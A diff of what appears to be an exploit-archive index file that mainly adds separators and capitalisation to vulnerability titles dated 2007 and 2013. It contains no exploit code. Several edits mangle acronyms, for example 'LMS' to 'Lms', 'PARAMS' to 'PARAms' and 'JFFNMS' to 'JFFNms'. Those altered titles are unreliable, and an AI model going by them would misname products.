AOLSRVR.EXE Buffer Overflow Vulnerability",2007-04-13,"Aaron Portnoy",windows,remote,0 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 Img_Popup.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0 29855,platforms/php/webapps/29855.txt,"Flowers Cas.PHP Cross-Site Scripting Vulnerability",2007-04-14,the_Edit0r,php,webapps,0 @@ -26793,25 +26793,25 @@ id,file,description,date,author,platform,type,port 29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 Showpic.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0 .3.3b SQL Injection Protection Bypass and Multiple SQL Injection Vulnerabilities",2007-04-17,Aleksandar,php,webapps,0 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0 -29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 Multiple SQL Injection Vulnerabilities",2007-04-18,"John Martinelli",php,webapps,0 +29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injection Vulnerabilities",2007-04-18,"John Martinelli",php,webapps,0 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 PHPBB_Root_Path Remote File Include Vulnerability",2007-04-19,"HACKERS PAL",php,webapps,0 29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.PHP Remote File Include Vulnerability",2007-04-20,Omni,php,webapps,0 -29875,platforms/multiple/dos/29875.py,"AMSN 0.96 Malformed Message Denial of Service Vulnerability",2007-04-21,"Levent Kayan",multiple,dos,0 +29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service Vulnerability",2007-04-21,"Levent Kayan",multiple,dos,0 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.PHP Cross-Site Scripting Vulnerability",2007-04-23,the_Edit0r,php,webapps,0 29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 Level2.PHP Remote File Include Vulnerability",2007-04-23,Dr.RoVeR,php,webapps,0 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 Init.Inc.PHP Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0 -29880,platforms/php/webapps/29880.txt,"File117 Multiple Remote File Include Vulnerabilities",2007-04-23,InyeXion,php,webapps,0 +29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Include Vulnerabilities",2007-04-23,InyeXion,php,webapps,0 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 Article.PHP SQL Injection Vulnerability",2007-04-23,"John Martinelli",php,webapps,0 29883,platforms/php/webapps/29883.txt,"ACVSWS Transport.PHP Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0 29884,platforms/multiple/remote/29884.txt,"Apple Quicktime <= 7.1.5 QTJava toQTPointer() Java Handling Arbitrary Code Execution Vulnerability",2007-04-23,"Shane Macaulay",multiple,remote,0 29885,platforms/php/webapps/29885.txt,"Claroline 1.x RootSys Remote File Include Vulnerability",2007-04-23,MoHaNdKo,php,webapps,0 -29886,platforms/php/webapps/29886.txt,"LMS 1.5.x RTMessageAdd.PHP Remote File Include Vulnerability",2007-04-23,InyeXion,php,webapps,0 +29886,platforms/php/webapps/29886.txt,"Lms 1.5.x RTMessageAdd.PHP Remote File Include Vulnerability",2007-04-23,InyeXion,php,webapps,0 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 admin.php Groups Module group_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 admin.php modsettings Module smiley_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 include/controlcenter/users.php Multiple Method Remote Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0 @@ -26823,7 +26823,7 @@ id,file,description,date,author,platform,type,port 29895,platforms/php/webapps/29895.txt,"phpMyAdmin <= 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 29896,platforms/windows/dos/29896.c,"Cdelia Software ImageProcessing Malformed BMP File Denial of Service Vulnerability",2007-04-24,Dr.Ninux,windows,dos,0 29897,platforms/windows/remote/29897.txt,"Progress 3.1 Webspeed _CPYFile.P Unauthorized Access Vulnerability",2007-04-24,suresync,windows,remote,0 -29898,platforms/php/webapps/29898.txt,"plesk <= 8.1.1 login.php3 - Directory Traversal vulnerability",2007-04-25,anonymous,php,webapps,0 +29898,platforms/php/webapps/29898.txt,"plesk <= 8.1.1 login.php3 - Directory Traversal Vulnerability",2007-04-25,anonymous,php,webapps,0 29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.PHP Remote File Include Vulnerability",2007-04-25,"Ali and Saeid",php,webapps,0 29900,platforms/multiple/dos/29900.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (1)",2007-03-21,"Barrie Dempster",multiple,dos,0 29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow Vulnerabilities (2)",2007-03-21,"Barrie Dempster",multiple,dos,0 @@ -26850,7 +26850,7 @@ id,file,description,date,author,platform,type,port 29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - (.wps) Buffer Overflow Exploit (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 29924,platforms/hardware/webapps/29924.txt,"TP-Link TD-8840t - CSRF Vulnerability",2013-11-30,"mohammed al-saggaf",hardware,webapps,0 29926,platforms/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - (.mp3) Crash PoC",2013-11-30,"Akin Tosunlar",windows,dos,0 -29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta, Inc. DPR2320R2 - Multiple CSRF vulnerability",2013-11-30,sajith,hardware,webapps,0 +29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta, Inc. DPR2320R2 - Multiple CSRF Vulnerability",2013-11-30,sajith,hardware,webapps,0 29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 BRY.ASP SQL Injection Vulnerability",2007-04-26,RMx,asp,webapps,0 29930,platforms/multiple/remote/29930.txt,"Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability",2007-04-27,jericho+bblog@attrition.org,multiple,remote,0 29931,platforms/multiple/remote/29931.txt,"ManageEngine Password Manager Pro Build 5401 Database Remote Unauthorized Access Vulnerability",2007-04-27,anonymous,multiple,remote,0 @@ -26930,7 +26930,7 @@ id,file,description,date,author,platform,type,port 30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA wserver.exe - Remote Code Execution",2013-12-03,metasploit,windows,remote,12221 30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection",2013-12-03,metasploit,php,remote,80 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0 -30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation",2013-12-03,ryujin,windows,local,0 30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include Vulnerability",2007-05-08,netVigilance,php,webapps,0 @@ -26943,7 +26943,7 @@ id,file,description,date,author,platform,type,port 30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.PHP Cross-Site Scripting Vulnerability",2007-05-10,the_Edit0r,php,webapps,0 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0 30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow Vulnerability",2007-05-11,"Victor Stinner",linux,dos,0 -30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 +30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal Vulnerability",2007-05-11,"Digital Defense",windows,remote,0 30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection Vulnerability",2007-05-12,"Alla Bezroutchko",php,webapps,0 30028,platforms/php/webapps/30028.txt,"EQDKP <= 1.3.1 Show Variable Cross-Site Scripting Vulnerability",2007-05-12,kefka,php,webapps,0 @@ -26968,7 +26968,7 @@ id,file,description,date,author,platform,type,port 30051,platforms/php/webapps/30051.txt,"PsychoStats <= 2.3 - Server.PHP Path Disclosure Vulnerability",2007-05-17,kefka,php,webapps,0 30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 -30054,platforms/jsp/webapps/30054.txt,"Sonicwall GMS 7.x - Filter Bypass & Persistent Vulnerability (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0 +30054,platforms/jsp/webapps/30054.txt,"Sonicwall Gms 7.x - Filter Bypass & Persistent Vulnerability (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0 30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module <= 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 @@ -26976,7 +26976,7 @@ id,file,description,date,author,platform,type,port 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 HLStats.PHP Multiple Cross Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 30065,platforms/php/webapps/30065.html,"GaliX 2.0 Index.PHP Multiple Cross Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injection Vulnerabilities",2007-05-21,"Jesper Jurcenoks",php,webapps,0 -30067,platforms/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal vulnerability",2007-05-22,"Jesus Roncero",windows,remote,0 +30067,platforms/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal Vulnerability",2007-05-22,"Jesus Roncero",windows,remote,0 30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 Login Variable Cross Site Scripting Vulnerability",2007-05-22,"Jesper Jurcenoks",php,webapps,0 30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 DartZipLite.DLL ActiveX Control Buffer Overflow Vulnerability",2007-05-22,shinnai,windows,remote,0 30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 Index.PHP HTML Injection Vulnerability",2007-05-22,"John Martinelli",php,webapps,0 @@ -27039,7 +27039,7 @@ id,file,description,date,author,platform,type,port 30129,platforms/php/webapps/30129.txt,"Prototype of an PHP application 0.1 common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 30130,platforms/php/remote/30130.txt,"PHP <= 5.2.3 EXT/Session HTTP Response Header Injection Vulnerability",2007-06-04,"Stefan Esser",php,remote,0 30131,platforms/php/webapps/30131.txt,"Buttercup WFM Title Parameter Cross-Site Scripting Vulnerability",2007-06-01,"John Martinelli",php,webapps,0 -30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) cross-site script vulnerability",2007-06-01,"Glafkos Charalambous ",php,webapps,0 +30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) cross-site script Vulnerability",2007-06-01,"Glafkos Charalambous ",php,webapps,0 30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 chat.php sid Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 help.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 admin/header.php admin[name] Parameter XSS",2007-06-01,ReZEN,php,webapps,0 @@ -27064,7 +27064,7 @@ id,file,description,date,author,platform,type,port 30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability",2007-06-06,"Dennis Rand",windows,dos,0 30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.PHP Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0 -30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0 +30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0 30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0 30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal 2.0 Haber_Oku.ASP SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0 30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0 @@ -27072,13 +27072,13 @@ id,file,description,date,author,platform,type,port 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0 30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 User ID Key Spoofing Vulnerability",2007-06-11,nnposter,windows,remote,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 -30171,platforms/php/webapps/30171.txt,"JFFNMS 0.8.3 auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 -30172,platforms/php/webapps/30172.txt,"JFFNMS 0.8.3 auth.php user Parameter XSS",2007-06-11,"Tim Brown",php,webapps,0 -30173,platforms/php/webapps/30173.txt,"JFFNMS 0.8.3 admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 -30174,platforms/php/webapps/30174.txt,"JFFNMS 0.8.3 admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 +30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 +30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 auth.php user Parameter XSS",2007-06-11,"Tim Brown",php,webapps,0 +30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 +30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 BB-Login.PHP Cross Site Scripting Vulnerability",2007-06-11,"Ory Segal",php,webapps,0 30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows Protocol Handler Command Injection Vulnerability",2007-06-12,"Thor Larholm",windows,remote,0 -30177,platforms/php/webapps/30177.txt,"PlaySMS <= 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 +30177,platforms/php/webapps/30177.txt,"PlaySms <= 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0 30186,platforms/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow Vulnerability",2007-06-12,"Cody Pierce",linux,remote,0 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 URL Protocol Format String Vulnerability",2007-06-12,"Nir Rachmel",multiple,dos,0 @@ -27123,9 +27123,9 @@ id,file,description,date,author,platform,type,port 30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 Filename Parse Error Information Disclosure Vulnerability",2007-06-25,"Shay Priel",multiple,remote,0 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 AuthACC SQL Injection Vulnerability",2007-06-25,netVigilance,php,webapps,0 30231,platforms/multiple/remote/30231.txt,"Key Focus Web Server 3.1 Index.WKF Cross-Site Scripting Vulnerability",2007-06-25,"Shay Priel",multiple,remote,0 -30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 +30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0 -30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 +30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0 @@ -27162,7 +27162,7 @@ id,file,description,date,author,platform,type,port 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.PHP Multiple Local File Include Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0 30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 -30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server <= 7.0 PARAMS Cross Site Scripting Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0 +30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server <= 7.0 PARAms Cross Site Scripting Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0 30280,platforms/linux/local/30280.txt,"GFax 0.7.6 Temporary Files Local Arbitrary Command Execution Vulnerability",2007-07-05,"Steve Kemp",linux,local,0 30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 Oku.ASP SQL Injection Vulnerability",2007-07-07,GeFORC3,asp,webapps,0 @@ -27188,7 +27188,7 @@ id,file,description,date,author,platform,type,port 30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 footer.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 secure.admin.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30308,platforms/windows/local/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,local,0 -30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 +30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0 30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 showuser who Parameter XSS",2007-07-14,"Christopher Schwardt",php,webapps,0 30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR TakeProfEdit.PHP HTML Injection Vulnerability",2007-07-16,PescaoDeth,asp,webapps,0 @@ -27200,7 +27200,7 @@ id,file,description,date,author,platform,type,port 30319,platforms/linux/remote/30319.c,"tcpdump Print-bgp.C Remote Integer Underflow Vulnerability",2007-03-01,mu-b,linux,remote,0 30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 deletecomment.php id Variable Remote Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 deleteblog.php id Variable Remote Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 Multiple Code Execution, Denial of Service and Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 +30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 - Multiple Code Execution, Denial of Service and Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 install/upgrade-0-2-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 install/upgrade-0-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 @@ -27218,9 +27218,9 @@ id,file,description,date,author,platform,type,port 30362,platforms/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",hardware,webapps,0 30364,platforms/php/webapps/30364.txt,"Lowest Unique Bid Auction - SQL Injection Vulnerabilities",2013-12-16,3spi0n,php,webapps,0 30365,platforms/php/webapps/30365.txt,"Penny Auction 5 - SQL Injection Vulnerabilities",2013-12-16,3spi0n,php,webapps,0 -30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 -30367,platforms/php/webapps/30367.txt,"AlstraSoft SMS Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 -30368,platforms/php/webapps/30368.txt,"AlstraSoft SMS Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 +30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 +30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 +30368,platforms/php/webapps/30368.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30369,platforms/php/webapps/30369.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/index.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30370,platforms/php/webapps/30370.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/temp.php rowid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30371,platforms/php/webapps/30371.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 @@ -27257,7 +27257,7 @@ id,file,description,date,author,platform,type,port 30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0 30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0 30409,platforms/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps,0 -30413,platforms/windows/dos/30413.py,"PotPlayer Version 1.5.40688 - .avi File Handling Memory Corruption Vulnerability",2013-12-20,ariarat,windows,dos,0 +30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - .avi File Handling Memory Corruption Vulnerability",2013-12-20,ariarat,windows,dos,0 30414,platforms/windows/dos/30414.py,"GOM Player 2.2.56.5158 - .avi File Handling Memory Corruption Vulnerability",2013-12-20,ariarat,windows,dos,0 30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0 30422,platforms/windows/dos/30422.py,"Easy Karaokay Player 3.3.31 - (.wav) Integer Division by Zero",2013-12-22,"Osanda Malith",windows,dos,0 @@ -27268,7 +27268,7 @@ id,file,description,date,author,platform,type,port 30427,platforms/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI Login.ASP SQL Injection Vulnerability",2007-07-28,"Aria-Security Team",asp,webapps,0 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog SQL Injection Vulnerability",2007-07-28,"Aria-Security Team",asp,webapps,0 30429,platforms/php/webapps/30429.txt,"phpCoupon Remote Payment Bypass Vulnerability",2007-07-28,freeprotect.net,php,webapps,0 -30430,platforms/linux/remote/30430.txt,"Fail2ban <= 0.8 Remote Denial of Service Vulnerability",2007-07-28,"Daniel B. Cid",linux,remote,0 +30430,platforms/linux/remote/30430.txt,"Fail2ban <= 0.8 - Remote Denial of Service Vulnerability",2007-07-28,"Daniel B. Cid",linux,remote,0 30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 BaiduBar.DLL ActiveX Control Remote Code Execution Vulnerability",2007-07-29,cocoruder,windows,remote,0 30432,platforms/novell/remote/30432.txt,"Novell GroupWise 6.5 WebAccess User.Id Parameter Cross Site Scripting Vulnerability",2007-07-30,0x000000,novell,remote,0 30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 lang-en.php wndtitle Parameter XSS",2007-07-30,"Aria-Security Team",php,webapps,0 @@ -27336,7 +27336,7 @@ id,file,description,date,author,platform,type,port 30498,platforms/multiple/dos/30498.txt,"Live For Speed S1/S2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,dos,0 30499,platforms/multiple/remote/30499.txt,"RndLabs Babo Violent 2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,remote,0 30500,platforms/windows/dos/30500.txt,"Yahoo! Messenger 8.1 KDU_V32M.DLL - Remote Denial of Service Vulnerability",2007-08-15,team509,windows,dos,0 -30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 Multiple Remote File Include Vulnerabilities",2007-07-09,Crackers_Child,php,webapps,0 